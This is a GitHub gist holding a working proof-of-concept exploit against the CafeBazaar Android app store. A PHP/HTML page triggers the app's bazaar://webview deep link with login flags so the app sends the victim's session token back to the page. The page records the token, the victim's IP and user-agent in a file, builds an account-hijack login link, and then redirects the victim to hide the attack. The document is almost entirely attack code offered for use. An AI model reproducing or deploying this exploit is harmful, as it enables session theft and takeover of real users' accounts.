Skip to content

Instantly share code, notes, and snippets.

@Voorivex
Created June 23, 2020 07:42
Show Gist options
  • Save Voorivex/ec287b4f33c7345d0a7342bf092e80d9 to your computer and use it in GitHub Desktop.
Save Voorivex/ec287b4f33c7345d0a7342bf092e80d9 to your computer and use it in GitHub Desktop.
<?php
if (isset($_GET['key'])) {
//Get authentication token
$token = $_GET['key'];
$login_link = "https://cafebazaar.ir/login/bysession?key=" . $token . "&next=/account/";
$login_link = "Login link: <a href='" . $login_link . "' target='_blank'>" . $login_link . "</a>";
if ($token == "") {
$login_link = "Login Link: Failure! Victim not logged in.";
}
//Get victim's IP address
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$IP = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$IP = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$IP = $_SERVER['REMOTE_ADDR'];
}
//Get current date
date_default_timezone_set('Asia/Tehran');
$date = date('m/d/Y H:i:s', time());
//Save information to BazaarTokens.html
file_put_contents("BazaarTokens.html", "IP address: " . $IP . "<br>WebView User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "<br>Date: " . $date . "<br>" . $login_link . "<hr>", FILE_APPEND);
}
?>
<html>
<body>
<script>
function Check() {
if (navigator.userAgent.toLowerCase().indexOf("android") != -1) {
Exploit()
} else {// Running device isn't Android
document.body.innerText = "Exploit code should be tested on Android devices.";
}
}
function Exploit() {//Open payload link automatically or ask the victim to click it.
var payload = "bazaar://webview?title=&url=" + encodeURIComponent(document.location.href + "?key=%s") + "&is_internal=true&login=true";
document.body.innerHTML += ("<a href='" + payload + "'><button>Click Me!</button></a>")
document.location = payload;
}
if (document.location.href.indexOf("key") == -1) { //Run exploit code
Check();
} else { //Finished, Redirect victim to Divar page on CafeBazaar after successful exploitation...
document.location = "bazaar://details?id=ir.divar"
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment